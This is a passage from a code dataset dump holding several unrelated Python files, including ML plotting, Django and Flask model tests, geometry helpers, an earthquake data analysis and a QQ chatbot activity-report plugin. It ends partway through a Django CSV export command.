learning_rate='auto',\n init='random', perplexity=30).fit_transform(data_preprocess)\n\n# reducer = umap.UMAP(random_state=42, n_neighbors=15, min_dist=0.4, n_components=2, metric='euclidean')#30, 0.6\n# embedding1 = reducer.fit_transform(data_preprocess)\n\nembedding = embedding1[:num_classes_consider*fixed_number]\nembedding_anchor = embedding1[num_classes_consider*fixed_number:num_classes_consider*fixed_number+num_classes_consider]\n# embedding_outlier = embedding1[num_classes_consider*fixed_number+num_classes_consider:num_classes_consider*fixed_number+num_classes_consider+num_classes_consider*outlier_number]\n# embedding_df_outlier = embedding1[num_classes_consider*fixed_number+num_classes_consider+num_classes_consider*outlier_number:]\n# breakpoint()\nfig, ax = plt.subplots(figsize=(12, 12))\ndef get_cmap(n, name='Pastel1'):\n '''Returns a function that maps each index in 0, 1, ..., n-1 to a distinct\n RGB color; the keyword argument name must be a standard mpl colormap name.'''\n return plt.cm.get_cmap(name, n)\n\ncolor = get_cmap(num_classes_consider)\n\n# color = ['#1f77b4', '#ff7f0e', '#2ca02c', '#d62728', '#9467bd', '#8c564b', '#e377c2', '#7f7f7f', '#bcbd22', '#17becf']\n# breakpoint()\nsum = 0\nsum_outlier = 0\nsum_anchor = 0\nsum_df = 0\n# breakpoint()\nfor i in range(0, num_classes_consider):\n # breakpoint()\n # color1 = color[i]\n # print(color1)\n plt.scatter(embedding[:, 0][sum: sum + number_class[i]],\n embedding[:, 1][sum: sum + number_class[i]],\n cmap=color, s=5)\n # plt.scatter(embedding_outlier[:, 0][sum_outlier: sum_outlier + outlier_number],\n # embedding_outlier[:, 1][sum_outlier: sum_outlier + outlier_number],\n # c='b', s=60, marker='*')\n #\n if i == 99:\n plt.scatter(embedding_anchor[:, 0][sum_anchor],\n embedding_anchor[:, 1][sum_anchor],\n c='k', s=30, label='Token Embed.')\n else:\n plt.scatter(embedding_anchor[:, 0][sum_anchor],\n embedding_anchor[:, 1][sum_anchor],\n c='k', s=30)\n\n sum += number_class[i]\n sum_outlier += outlier_number\n sum_anchor += 1\n # sum_df += length[i]\n\n\nplt.legend(fontsize=20)\n# ax.legend(loc='lower left',markerscale=9)\nplt.setp(ax, xticks=[], yticks=[])\nplt.savefig('./feat_dis_clip.jpg', dpi=250)\n# plt.show()","repo_name":"deeplearning-wisc/dream-ood","sub_path":"scripts/cache/clip_plot.py","file_name":"clip_plot.py","file_ext":"py","file_size_in_byte":4406,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"37"} +{"seq_id":"39719760721","text":"from datetime import datetime\nfrom sqlalchemy import Column, DateTime\nfrom sqlalchemy.ext.declarative import declarative_base\n\nBase = declarative_base()\n\n\nclass Core(object):\n \"\"\"A mixin for other SQLAlchemy ORM classes. Includes a date_craeted and\n date_updated field for all database tables.\"\"\"\n date_created = Column(\n DateTime,\n default=datetime.utcnow(),\n index=True\n )\n\n date_modified = Column(\n DateTime,\n default=datetime.utcnow(),\n onupdate=datetime.utcnow(),\n index=True\n )\n\n def __iter__(self):\n for key in dir(self):\n yield (key, getattr(self, key))","repo_name":"NYPL/drb-etl-pipeline","sub_path":"model/postgres/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"35194839159","text":"import os\nfrom models import Book, Reader, Review\nfrom config import db, db_file\n\n\nif __name__ == '__main__':\n # remove old db so we can create it again \n if os.path.exists(db_file):\n os.remove(db_file)\n\n # create tables\n db.create_all()\n\n # creating test instances\n book1 = Book(title='The Hobbit',\n author='J. R. R. Tolkien',\n description='The adventures of Bilbo',\n genre='adventure',\n publisher='Allen & Unwin')\n \n book2 = Book(title='Harry Potter', \n author='J. K. Rowling',\n description='A book about magic',\n genre='fantasy',\n publisher='Bloomsbury Publishing')\n\n # commiting tests\n db.session.add(book1)\n db.session.add(book2)\n db.session.commit()\n \n # show one of the tests\n print(book1,'\\n')\n\n # show the same test but in json format\n print(book1.json())\n\n print('='*140,'\\n')\n\n # creating and commiting the reviewer\n reader = Reader(name ='Vítor Otto',\n age = '18', \n profession = 'Estudante', \n fav_book = book1)\n\n reader2 = Reader(name ='Carlos',\n age = '20', \n profession = 'Desempregado')\n \n db.session.add(reader)\n db.session.add(reader2)\n db.session.commit()\n \n print(reader,'\\n')\n print(reader2,'\\n')\n print(reader.json())\n \n\n print('='*140,'\\n')\n\n # creating the review\n review = Review(rating = '8.5',\n date = '10/11/2020',\n opinion = '''Esse é meu livro favorito não por causa da história, mas porque foi um presente especial''',\n book = book1,\n author = reader)\n\n db.session.add(review)\n db.session.commit()\n\n print(review,'\\n')\n print(review.json())\n \n print(f'\\n{review.author.name} está avaliando o livro {review.book.title}')","repo_name":"vitorueno/PGM2-2020","sub_path":"sistema-livros/back-end/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6304137025","text":"import math\nfrom decimal import Decimal\n\nfrom django.db.models import DecimalField\nfrom django.db.models.functions import Exp\nfrom django.test import TestCase\nfrom django.test.utils import register_lookup\n\nfrom ..models import DecimalModel, FloatModel, IntegerModel\n\n\nclass ExpTests(TestCase):\n def test_null(self):\n IntegerModel.objects.create()\n obj = IntegerModel.objects.annotate(null_exp=Exp(\"normal\")).first()\n self.assertIsNone(obj.null_exp)\n\n def test_decimal(self):\n DecimalModel.objects.create(n1=Decimal(\"-12.9\"), n2=Decimal(\"0.6\"))\n obj = DecimalModel.objects.annotate(n1_exp=Exp(\"n1\"), n2_exp=Exp(\"n2\")).first()\n self.assertIsInstance(obj.n1_exp, Decimal)\n self.assertIsInstance(obj.n2_exp, Decimal)\n self.assertAlmostEqual(obj.n1_exp, Decimal(math.exp(obj.n1)))\n self.assertAlmostEqual(obj.n2_exp, Decimal(math.exp(obj.n2)))\n\n def test_float(self):\n FloatModel.objects.create(f1=-27.5, f2=0.33)\n obj = FloatModel.objects.annotate(f1_exp=Exp(\"f1\"), f2_exp=Exp(\"f2\")).first()\n self.assertIsInstance(obj.f1_exp, float)\n self.assertIsInstance(obj.f2_exp, float)\n self.assertAlmostEqual(obj.f1_exp, math.exp(obj.f1))\n self.assertAlmostEqual(obj.f2_exp, math.exp(obj.f2))\n\n def test_integer(self):\n IntegerModel.objects.create(small=-20, normal=15, big=-1)\n obj = IntegerModel.objects.annotate(\n small_exp=Exp(\"small\"),\n normal_exp=Exp(\"normal\"),\n big_exp=Exp(\"big\"),\n ).first()\n self.assertIsInstance(obj.small_exp, float)\n self.assertIsInstance(obj.normal_exp, float)\n self.assertIsInstance(obj.big_exp, float)\n self.assertAlmostEqual(obj.small_exp, math.exp(obj.small))\n self.assertAlmostEqual(obj.normal_exp, math.exp(obj.normal))\n self.assertAlmostEqual(obj.big_exp, math.exp(obj.big))\n\n def test_transform(self):\n with register_lookup(DecimalField, Exp):\n DecimalModel.objects.create(n1=Decimal(\"12.0\"), n2=Decimal(\"0\"))\n DecimalModel.objects.create(n1=Decimal(\"-1.0\"), n2=Decimal(\"0\"))\n obj = DecimalModel.objects.filter(n1__exp__gt=10).get()\n self.assertEqual(obj.n1, Decimal(\"12.0\"))\n","repo_name":"django/django","sub_path":"tests/db_functions/math/test_exp.py","file_name":"test_exp.py","file_ext":"py","file_size_in_byte":2268,"program_lang":"python","lang":"en","doc_type":"code","stars":74132,"dataset":"github-code","pt":"37"} +{"seq_id":"29879030562","text":"import numpy as np\n\n\ndef is_intersect_perpendicular_point_to_line(point, line_start, line_end):\n \"\"\"\n check if perpendicular line from point to line segment intersects\n Args:\n point: point in numpy.array\n line_start: line segment start point in numpy.array\n line_end: line segment end point in numpy.array\n Returns:\n result: Bool value if perpendicular line intersects or not\n \"\"\"\n vec_start_to_point = point - line_start\n vec_start_to_end = line_end - line_start\n dot_product = np.dot(vec_start_to_point, vec_start_to_end)\n if dot_product > 0:\n norm_vec_start_to_end = np.linalg.norm(vec_start_to_end)\n projection = dot_product/norm_vec_start_to_end\n if projection < norm_vec_start_to_end:\n return True\n else:\n return False\n else:\n return False\n\n\ndef get_perpendicular_point_to_line(point, line_start, line_end):\n \"\"\"\n find the perpendicular point to line segment from point\n Args:\n point: point in numpy.array\n line_start: line segment start point in numpy.array\n line_end: line segment end point in numpy.array\n Returns:\n result: found perpendicular point to line segment in numpy.array\n \"\"\"\n vec_start_to_point = point - line_start\n vec_start_to_end = line_end - line_start\n dot_product = np.dot(vec_start_to_point, vec_start_to_end)\n norm_vec_start_to_end = np.linalg.norm(vec_start_to_end)\n projection = dot_product/norm_vec_start_to_end\n start_cross_vector = vec_start_to_end * (projection/norm_vec_start_to_end)\n return np.array([line_start[0]+start_cross_vector[0], line_start[1]+start_cross_vector[1]])\n\n\ndef get_closest_point_to_line(point, line_start, line_end):\n \"\"\"\n find the closest point on line segments from point\n reference : https://gihyo.jp/dev/serial/01/as3/0053\n Args:\n point: point in numpy.array\n line_start: line segment start point in numpy.array\n line_end: line segment end point in numpy.array\n Returns:\n result: found closest point on line segment in numpy.array\n \"\"\"\n vec_start_to_point = point - line_start\n vec_start_to_end = line_end - line_start\n dot_product = np.dot(vec_start_to_point, vec_start_to_end)\n if dot_product > 0:\n norm_vec_start_to_end = np.linalg.norm(vec_start_to_end)\n projection = dot_product/norm_vec_start_to_end\n if projection < norm_vec_start_to_end:\n start_cross_vector = vec_start_to_end * (projection/norm_vec_start_to_end)\n return np.array([line_start[0]+start_cross_vector[0], line_start[1]+start_cross_vector[1]])\n else:\n return np.copy(line_end)\n else:\n return np.copy(line_start)\n\n\ndef get_distance_to_queue_head(queue_expected_path_segment_idx, queue_expected_path_point, queue_expected_path_line_segments, queue_expected_path_line_segments_length):\n \"\"\"\n calculate distance from a point along queue expected path to head point of queue expected path\n Args:\n queue_expected_path_segment_idx: segment of queue expected path which is closest to input point\n queue_expected_path_point: input point on queue expected path\n queue_expected_path_line_segments: line segments of queue expected path\n queue_expected_path_line_segments_length: line segments length of queue expected path\n Returns:\n result: distance from input point to head point of queue expected path\n \"\"\"\n dist = 0.0\n for segment_idx in range(queue_expected_path_segment_idx, len(queue_expected_path_line_segments)):\n if segment_idx == queue_expected_path_segment_idx:\n dist += np.linalg.norm(queue_expected_path_line_segments[segment_idx][1]-queue_expected_path_point)\n else:\n dist += queue_expected_path_line_segments_length[segment_idx]\n return dist\n","repo_name":"CMU-cabot/cabot-navigation","sub_path":"queue_utils_py/queue_utils_py/geometry_utils.py","file_name":"geometry_utils.py","file_ext":"py","file_size_in_byte":3882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23590571899","text":"# Author: Darshan Ghorpade\n# Location: Earth\n# Date: 24/03/2022\n\n# Quick quiz\n# Q. Write a python program to print the content of a list using a while loop.\n\n# Take a list\nfruits = ['Banana', 'Watermelon', 'Mango', 'Apple', 'Pineapple', 'Grapes', 'Pomegranate', 'Papaya', 'Mudapple']\n\n# Initialise i to 0\ni = 0\n\n# Using while loop\nwhile i= 4]\nseisme_data = seisme_big[seisme_big['pays'].isin(noms.index)]\nprint(seisme_data)\nseaborn.boxplot(data=seisme_data, x=\"pays\", y='mag', orient=\"v\", dodge=False)\nplt.xticks(rotation=90)\nplt.show()\n\n# 4b\nseisme_max_mag_loc = seisme.groupby('pays')['mag'].idxmax()\nseisme_max_mag_eq = seisme.loc[seisme_max_mag_loc]\nseisme_mag_6 = seisme_max_mag_eq.sort_values('mag', ascending=False).head(6)\n#seisme_mag_data = seisme[seisme['mag'].isin(seisme_mag.index)]\nprint(\"6 lieux du monde qui enregistre la plus forte magnitude: \")\nprint(seisme_mag_6[['pays', 'mag']])\n\n# 4c\nseisme_californie_alaska = list()\nseisme_californie_alaska.append(seisme[(seisme['pays'] == 'Alaska') & (seisme[\"mag\"] <= 2)])\nseisme_californie_alaska.append(seisme[(seisme['pays'] == 'California') & (seisme[\"mag\"] <= 2)])\nprint(seisme_californie_alaska)\n\n\n# Étude supplémentaire de la relation entre profondeur et magnitude :\ndata = seisme[['mag', 'profondeur']]\nfig = px.scatter(data, y='mag', x='profondeur')\nfig.update_layout(title='Magnitude en fonction de la profondeur')\nfig.show()\n\n\n#Construction d'un tableau de contingence :\n\ntableau = pd.crosstab(data['profondeur'], data['mag'])\n\n#On applique le test d'indépendance Khi-deux sur le tableau de contingence :\n\nstatistique, p_value, _, _ = chi2_contingency(tableau)\nprint(\"Statistique du test Khi-2 : \", statistique)\nprint(\"P-value : \", p_value)\n\n# Calcul de l'odds ratio du tableau de contingence :\n\nodds_ratio = tableau.apply(lambda row: row / row.sum(), axis=1)\nprint(\"Tableau des odds-ratio :\")\nprint(odds_ratio)","repo_name":"PaulAdrPENET/projmaths","sub_path":"lecture.py","file_name":"lecture.py","file_ext":"py","file_size_in_byte":2309,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27123012740","text":"from utils.basicConfigs import ROOT_PATH, SAVE_TMP_PATH, sqlConfig, BOT_SELF_QQ\nfrom utils.basicEvent import send, warning, startswith_in, get_avatar_pic, get_group_avatar_pic\nfrom typing import Union, Tuple, Any, List, Optional\nfrom utils.standardPlugin import StandardPlugin\nfrom PIL import Image, ImageDraw, ImageFont\nfrom utils.sqlUtils import newSqlSession, mysql\nfrom utils.responseImage_beta import *\nimport matplotlib.pyplot as plt\nimport datetime\nfrom copy import deepcopy\nfrom io import BytesIO\nimport re\nimport random\n\nBOT_CMD = [ '-ddl','-canvas','-uag','签到','祈愿',\n '-help','-st','-lib','-hs','-mdd',\n '-jwc','-dekt','-mc','-sjmc','-fdc',\n '-xjtumc', '-mcs', '-xjmclive',\n '-tjmc','-mclive','-sjmclive',\n '-fdmclive','小马,','小🦄,',\n '小马,','小🦄,','-mycoins','-mytrans',\n '新闻', '-sjtu news', '交大新闻',\n '来点图图',\n '决斗','接受决斗','ttzf','izf',\n '-myact', '-wc', '-actrank','-bwc',\n '-bwrs','-bdrs','-zhrs', '-actclear',\n '-lxq', '执黑下象棋', '问答帮助', '猜单词', '-wordle'\n '猜成语','-handle',]\n\nclass ActReportPlugin(StandardPlugin): \n def judgeTrigger(self, msg:str, data:Any) -> bool:\n return msg == '-myact' and data['message_type'] == 'group'\n def executeEvent(self, msg:str, data:Any) -> Union[None, str]:\n imgPath = getMyActivity(data['user_id'], data['group_id'])\n if imgPath == None:\n send(data['group_id'], '[CQ:reply,id=%d]生成失败'%data['message_id'], data['message_type'])\n else:\n imgPath = imgPath if os.path.isabs(imgPath) else os.path.join(ROOT_PATH, imgPath)\n send(data['group_id'], '[CQ:image,file=files:///%s]'%imgPath, data['message_type'])\n return \"OK\"\n def getPluginInfo(self, )->Any:\n return {\n 'name': 'ActReport',\n 'description': '我的水群报告',\n 'commandDescription': '-myact',\n 'usePlace': ['group', ],\n 'showInHelp': True,\n 'pluginConfigTableNames': [],\n 'version': '1.0.0',\n 'author': 'Unicorn',\n }\n\nclass ActRankPlugin(StandardPlugin):\n def judgeTrigger(self, msg:str, data:Any) -> bool:\n return msg == '-actrank' and data['message_type'] == 'group' \n def executeEvent(self, msg:str, data:Any) -> Union[None, str]:\n imgPath = getGroupActivityRank(data['group_id'])\n if imgPath == None:\n send(data['group_id'], '[CQ:reply,id=%d]生成失败'%data['message_id'], data['message_type'])\n else:\n imgPath = imgPath if os.path.isabs(imgPath) else os.path.join(ROOT_PATH, imgPath)\n send(data['group_id'], '[CQ:image,file=files:///%s]'%imgPath, data['message_type'])\n return \"OK\"\n def getPluginInfo(self, )->Any:\n return {\n 'name': 'ActRank',\n 'description': '水群排行榜',\n 'commandDescription': '-actrank',\n 'usePlace': ['group', ],\n 'showInHelp': True,\n 'pluginConfigTableNames': [],\n 'version': '1.0.0',\n 'author': 'Unicorn',\n } \n \ndef getMyActivity(user_id:int, group_id:int)->Optional[str]:\n \"\"\"生成并绘制水群报告\n @user_id: 用户QQ\n @group_id: 群\n\n @return:\n if str: 生成成功,返回图片存储地址\n elif None: 生成失败\n \"\"\"\n messageNumber = 0\n messageWithBotNumber = 0\n messageDescript = ''\n messageMedal = []\n messageWithBotMedal = []\n messageImgEmjMedal = []\n try:\n mydb, mycursor = newSqlSession()\n mycursor.execute(\"SELECT message_seq from `clearChatLog` where user_id = %d and group_id = %d\"%(user_id, group_id))\n result=list(mycursor)\n minSeq = None if len(result) == 0 else result[0][0]\n if minSeq == None:\n mycursor.execute(\"SELECT time, message FROM messageRecord where user_id=%d and group_id=%d\"%(user_id, group_id))\n else:\n mycursor.execute(\"SELECT time, message FROM messageRecord where user_id=%d and group_id=%d and message_seq > %d\"%(user_id, group_id, minSeq))\n\n result=list(mycursor)\n # 消息数量\n messageNumber = len(result)\n # 消息-时间图\n time_mes = {}\n time_meswithbot = {}\n time_meswithimgemoji = {} #图片类动画表情\n st:datetime.datetime = result[0][0]\n et:datetime.datetime = result[-1][0]\n for time, message in result:\n time: datetime.datetime\n message: str\n message = message.strip()\n t = time.strftime('%Y-%m-%d')\n y = time_mes.get(t,0)\n y += 1\n time_mes[t] = y\n if startswith_in(message.strip(),BOT_CMD):\n y = time_meswithbot.get(t,0)\n y += 1\n time_meswithbot[t] = y\n # pattern= re.compile(r'^\\[CQ\\:image\\,file.*subType\\=1\\,.*\\]')\n if ('[CQ:image,file' in message and 'subType=1' in message):\n y = time_meswithimgemoji.get(t,0)\n y += 1\n time_meswithimgemoji[t] = y\n ct:datetime.datetime = deepcopy(st)\n while (ctdatetime.datetime.now():\n break\n t = ct.strftime('%Y-%m-%d')\n y = time_mes.get(t,0)\n if y==0:\n time_mes[t] = 0\n y = time_meswithbot.get(t,0)\n if y==0:\n time_meswithbot[t] = 0\n y = time_meswithimgemoji.get(t,0)\n if y==0:\n time_meswithimgemoji[t] = 0\n # sorted(time_mes.keys())\n x_list = list(time_mes.keys())\n y_list = list(time_mes.values())\n x_list = [datetime.datetime.strptime(x,'%Y-%m-%d') for x in x_list]\n # 消息最多的天\n y_max = max(y_list)\n x_max = x_list[y_list.index(y_max)].strftime('%Y 年 %m 月 %d 日')\n # 平均消息\n y_avg = messageNumber / (int((et.date()-st.date()).days)+1)\n if (y_max <= 5):\n messageDescript = '你是本群的潜水员,日最多发送信息少于 5 条'\n messageMedal.append('🎖️资深潜水')\n else:\n if y_avg<15:\n messageDescript = '你在本群低调内敛,平均每日发送信息 %.2f 条'%(y_avg)\n elif y_avg<50:\n messageDescript = '你在本群比较活跃,平均每日发送信息 %.2f 条'%(y_avg)\n else:\n messageDescript = '你在本群侃侃而谈,平均每日发送信息 %.2f 条'%(y_avg)\n messageMedal.append('🎖️水群大师')\n messageDescript += '\\n%s,你一共发送了 %d 条信息'%(x_max, y_max)\n if messageNumber >=3000:\n messageMedal.append('🎖️活跃元老')\n elif y_max >=300:\n messageMedal.append('🎖️谈天说地')\n\n plt.figure(figsize=(10, 3)) \n plt.bar(x_list, y_list, color='#87CEEB')\n ax = plt.gca()\n ax.set_facecolor('#E8F8FF')\n plt.xticks(rotation=25,size=9)\n time_dis_path = BytesIO()\n plt.margins(0.002, 0.1)\n plt.subplots_adjust(top=1,bottom=0,left=0,right=1,hspace=0,wspace=0) \n plt.savefig(time_dis_path, dpi=200, bbox_inches='tight')\n card_content1 = [\n ('subtitle','共发送信息 %d 条\\n'%(messageNumber),PALETTE_SJTU_BLUE),\n ('separator',),\n ('illustration', time_dis_path),\n ('body', messageDescript)\n ]\n if len(messageMedal) > 0:\n card_content1.append(('subtitle', ' '.join(messageMedal), PALETTE_SJTU_BLUE))\n\n # Bot互动-时间图\n x_list = list(time_meswithbot.keys())\n y_list = list(time_meswithbot.values())\n x_list = [datetime.datetime.strptime(x,'%Y-%m-%d') for x in x_list]\n messageWithBotNumber = sum(y_list)\n\n # Bot互动-奖章\n if (messageWithBotNumber>=500):\n messageWithBotMedal.append('🎖️高级测试工程师')\n elif (messageWithBotNumber>=200):\n messageWithBotMedal.append('🎖️中级测试工程师')\n elif (messageWithBotNumber>=50):\n messageWithBotMedal.append('🎖️初级测试工程师')\n if (messageWithBotNumber / messageNumber > 0.4):\n messageWithBotMedal.append('🎖️信息熵操纵者')\n plt.figure(figsize=(10, 3)) \n plt.bar(x_list, y_list, color='#F8AC51')\n ax = plt.gca()\n ax.set_facecolor('#FFEFDD')\n plt.xticks(rotation=25,size=9)\n time_dis2_path = BytesIO()\n plt.margins(0.002, 0.1)\n plt.subplots_adjust(top=1,bottom=0,left=0,right=1,hspace=0,wspace=0) \n plt.savefig(time_dis2_path, dpi=200, bbox_inches='tight')\n card_content2 = [\n ('subtitle','与小🦄共互动 %d 次\\n'%(messageWithBotNumber),PALETTE_SJTU_ORANGE),\n ('separator',),\n ('illustration', time_dis2_path)\n ]\n if len(messageWithBotMedal) > 0:\n card_content2.append(('subtitle', ' '.join(messageWithBotMedal), PALETTE_SJTU_ORANGE))\n \n # 图片信息-时间图\n x_list = list(time_meswithimgemoji.keys())\n y_list = list(time_meswithimgemoji.values())\n x_list = [datetime.datetime.strptime(x,'%Y-%m-%d') for x in x_list]\n messageImgEmojiNumber = sum(y_list)\n if (messageImgEmojiNumber>=500):\n messageImgEmjMedal.append('🎖️表情包之神')\n plt.figure(figsize=(10, 3)) \n plt.bar(x_list, y_list, color='#7DC473')\n ax = plt.gca()\n ax.set_facecolor('#E5FBE2')\n plt.xticks(rotation=25,size=9)\n time_dis3_path = BytesIO()\n plt.margins(0.002, 0.1)\n plt.subplots_adjust(top=1,bottom=0,left=0,right=1,hspace=0,wspace=0) \n plt.savefig(time_dis3_path, dpi=200, bbox_inches='tight')\n plt.close()\n card_content3 = [\n ('subtitle','共发送动画表情 %d 次\\n'%(messageImgEmojiNumber),PALETTE_SJTU_GREEN),\n ('separator',),\n ('illustration', time_dis3_path)\n ]\n if len(messageImgEmjMedal) > 0:\n card_content3.append(('subtitle', ' '.join(messageImgEmjMedal), PALETTE_SJTU_GREEN))\n\n img_avatar = Image.open(BytesIO(get_avatar_pic(user_id)))\n # 生成卡片图\n ActCards = ResponseImage(\n titleColor = PALETTE_SJTU_BLUE,\n title = '我的水群报告',\n layout = 'normal',\n width = 880,\n cardBodyFont= ImageFont.truetype(os.path.join(FONTS_PATH, 'SourceHanSansCN-Medium.otf'), 24),\n cardSubtitleFont= ImageFont.truetype(os.path.join(FONTS_PATH, 'SourceHanSansCN-Medium.otf'), 30),\n )\n ActCards.addCardList([\n ResponseImage.RichContentCard(\n raw_content=[\n ('subtitle','ID : %d'%(user_id)),\n ('separator',),\n ('keyword','群 : %d'%(group_id))\n ],\n icon = img_avatar\n ),\n ResponseImage.RichContentCard(\n raw_content = card_content1\n ),\n ResponseImage.RichContentCard(\n raw_content = card_content2\n ),\n ResponseImage.RichContentCard(\n raw_content = card_content3\n )\n ])\n save_path = (os.path.join(SAVE_TMP_PATH, f'{user_id}_{group_id}_actReport.png'))\n ActCards.generateImage(save_path)\n return save_path\n except mysql.connector.Error as e:\n warning(\"mysql error in getMyActivity: {}\".format(e))\n except BaseException as e:\n warning(\"error in getMyActivity: {}\".format(e))\n\ndef getGroupActivityRank(group_id:int)->Optional[str]:\n \"\"\"生成并绘制水群排行\n @group_id: 群号\n \n @return:\n if str: 生成成功,返回图片存储地址\n elif None: 生成失败\n \"\"\"\n try:\n mydb, mycursor = newSqlSession()\n # 获取群里删除过act的人数\n mycursor.execute('select count(*) from `clearChatLog` where group_id=%d'%group_id)\n queryPeopleNum = list(mycursor)[0][0] + 15\n # mycursor.execute(\"SELECT ANY_VALUE(nickname), ANY_VALUE(card), user_id, COUNT(*) FROM messageRecord WHERE group_id=%d and user_id!=%d GROUP BY user_id ORDER BY COUNT(user_id) DESC LIMIT 15;\"%(group_id, BOT_SELF_QQ))\n randNum = random.randint(1e9, 1e10-1)\n tempTableName = 'actRank_'+str(randNum)+'_'+str(group_id)\n tempProcName = 'getNick_'+str(randNum)+'_'+str(group_id)\n mycursor.execute('drop temporary table if exists %s'%(tempTableName))\n mycursor.execute(\"\"\"\n create temporary table %s \n select user_id as u, count(*) as c from `messageRecord` \n where group_id=%d and user_id != %d group by user_id\n order by count(user_id) desc limit %d\"\"\"%(tempTableName, group_id, BOT_SELF_QQ, queryPeopleNum))\n mycursor.execute(\"alter table %s add column n varchar(50)\"%(tempTableName))\n mycursor.execute(\"drop procedure if exists %s\"%tempProcName)\n mycursor.execute(\"\"\"create procedure %s()\n begin\n declare nick varchar(50);\n declare uid bigint unsigned;\n declare cleared bool;\n declare done bool default false;\n declare cur cursor for select u from %s;\n declare continue handler for sqlstate '02000' set done = true;\n open cur;\n repeat\n fetch cur into uid;\n select if(card = '', nickname, card) into nick\n FROM `messageRecord` \n WHERE message_seq = ( \n select max(message_seq) from `messageRecord` \n where user_id = uid and group_id = %d\n ) and group_id = %d;\n update %s set n = nick where u = uid;\n \n select count(*) > 0 from `clearChatLog` \n where group_id = %d and user_id = uid into cleared;\n if cleared then\n update %s set c = (\n select count(*) from messageRecord \n where group_id = %d and user_id = uid and message_seq > (\n select `message_seq` from `clearChatLog`\n where group_id = %d and user_id = uid\n )\n )where u = uid;\n end if;\n\n until done = true\n end repeat;\n close cur;\n end; \"\"\"%(tempProcName, tempTableName, group_id, group_id, tempTableName,\n group_id, tempTableName, group_id, group_id))\n mycursor.execute(\"call %s()\"%tempProcName)\n mycursor.execute(\"select n, u, c from %s\"%(tempTableName))\n result=list(mycursor)\n result = sorted(result, key=lambda x:x[2], reverse=True)[:15]\n card_content = []\n max_num = result[0][2]\n for index, (nickname, user_id, count) in enumerate(result):\n text = \"%d. %s : %d条\"%(index+1, nickname, count)\n if index <= 3:\n card_content.append(('subtitle',text))\n card_content.append(('progressBar', count/max_num, PALETTE_ORANGE, PALETTE_LIGHTORANGE))\n else:\n card_content.append(('body',text))\n card_content.append(('progressBar', count/max_num, PALETTE_GREEN, PALETTE_LIGHTGREEN))\n\n img_avatar = Image.open(BytesIO(get_group_avatar_pic(group_id)))\n ActRankCards = ResponseImage(\n titleColor = PALETTE_SJTU_BLUE,\n title = '水群排行榜',\n footer = '* 数据统计仅包含小🦄1.0.0版本更新后群内消息',\n layout = 'normal',\n width = 880,\n cardSubtitleFont= ImageFont.truetype(os.path.join(FONTS_PATH, 'SourceHanSansCN-Medium.otf'), 27),\n cardBodyFont= ImageFont.truetype(os.path.join(FONTS_PATH, 'SourceHanSansCN-Medium.otf'), 24),\n )\n ActRankCards.addCardList([\n ResponseImage.RichContentCard(\n raw_content=[\n ('keyword','群 : %d'%(group_id)),\n ('separator',),\n ('subtitle','截至 : '+datetime.datetime.strftime(datetime.datetime.now(),'%Y-%m-%d %H:%M:%S'))\n ],\n icon = img_avatar\n ),\n ResponseImage.RichContentCard(\n raw_content = card_content\n )\n ])\n save_path = (os.path.join(SAVE_TMP_PATH, f'{group_id}_actRank.png'))\n ActRankCards.generateImage(save_path)\n return save_path\n except mysql.connector.Error as e:\n warning(\"mysql error in getGroupActivityRank: {}\".format(e))\n except BaseException as e:\n warning(\"error in getGroupActivityRank: {}\".format(e))","repo_name":"UNIkeEN/Little-UNIkeEN-Bot","sub_path":"plugins/groupActReport.py","file_name":"groupActReport.py","file_ext":"py","file_size_in_byte":16843,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"37"} +{"seq_id":"30169023481","text":"# -*- coding: utf-8 -*-\nimport csv\nfrom itertools import chain\nimport logging\nfrom datetime import datetime\nimport re\nfrom unidecode import unidecode\nfrom optparse import make_option\nfrom django.core.management import BaseCommand\nfrom django.conf import settings\nfrom territori.models import Territorio, Incarico\n\n__author__ = 'stefano'\n\n\ndef dump(qs, outfile_path):\n # \"\"\"\n # Takes in a Django queryset and spits out a CSV file.\n #\n # Usage::\n #\n # \t>> from utils import dump2csv\n # \t>> from dummy_app.models import *\n # \t>> qs = DummyModel.objects.all()\n # \t>> dump2csv.dump(qs, './data/dump.csv')\n #\n # Based on a snippet by zbyte64::\n #\n # \thttp://www.djangosnippets.org/snippets/790/\n #\n # \"\"\"\n\n model = qs.model\n writer = csv.writer(open(outfile_path, 'w'))\n\n headers = []\n for field in model._meta.fields:\n headers.append(field.name)\n writer.writerow(headers)\n\n for obj in qs:\n row = []\n for field in headers:\n val = getattr(obj, field)\n if callable(val):\n val = val()\n if type(val) == unicode:\n val = val.encode(\"utf-8\")\n row.append(val)\n writer.writerow(row)\n\n\nclass Command(BaseCommand):\n\n accepted_types = ['all', 'capoluoghi', 'others']\n\n option_list = BaseCommand.option_list + (\n\n make_option('--territori', '-t',\n dest='territori',\n action='store',\n default='all',\n help='Type of Territorio: ' + ' | '.join(accepted_types)),\n\n make_option('--output', '-o',\n dest='output_file',\n action='store',\n default='',\n help='Path to output file + filename', ),\n\n make_option('--dry-run',\n dest='dryrun',\n action='store_true',\n default=False,\n help='Set the dry-run command mode: nothing is written on db'),\n\n )\n\n help = 'Export political charges into csv file'\n logger = logging.getLogger('management')\n\n def handle(self, *args, **options):\n verbosity = options['verbosity']\n if verbosity == '0':\n self.logger.setLevel(logging.ERROR)\n elif verbosity == '1':\n self.logger.setLevel(logging.WARNING)\n elif verbosity == '2':\n self.logger.setLevel(logging.INFO)\n elif verbosity == '3':\n self.logger.setLevel(logging.DEBUG)\n\n dryrun = options['dryrun']\n territori_type = options['territori']\n output_file = options['output_file']\n\n if output_file == '':\n self.logger.error(u\"Output file path is required\")\n return\n\n self.logger.info(u\"Start charges export with dryrun: {0}\".format(dryrun))\n self.handle_export(territori_type, output_file, dryrun)\n self.logger.info(u\"End import charges script\")\n\n def handle_export(self, territori_type, output_file, dryrun):\n\n # prende tutte le citta' capoluogo di provincia\n capoluoghi_provincia = Territorio.objects.\\\n 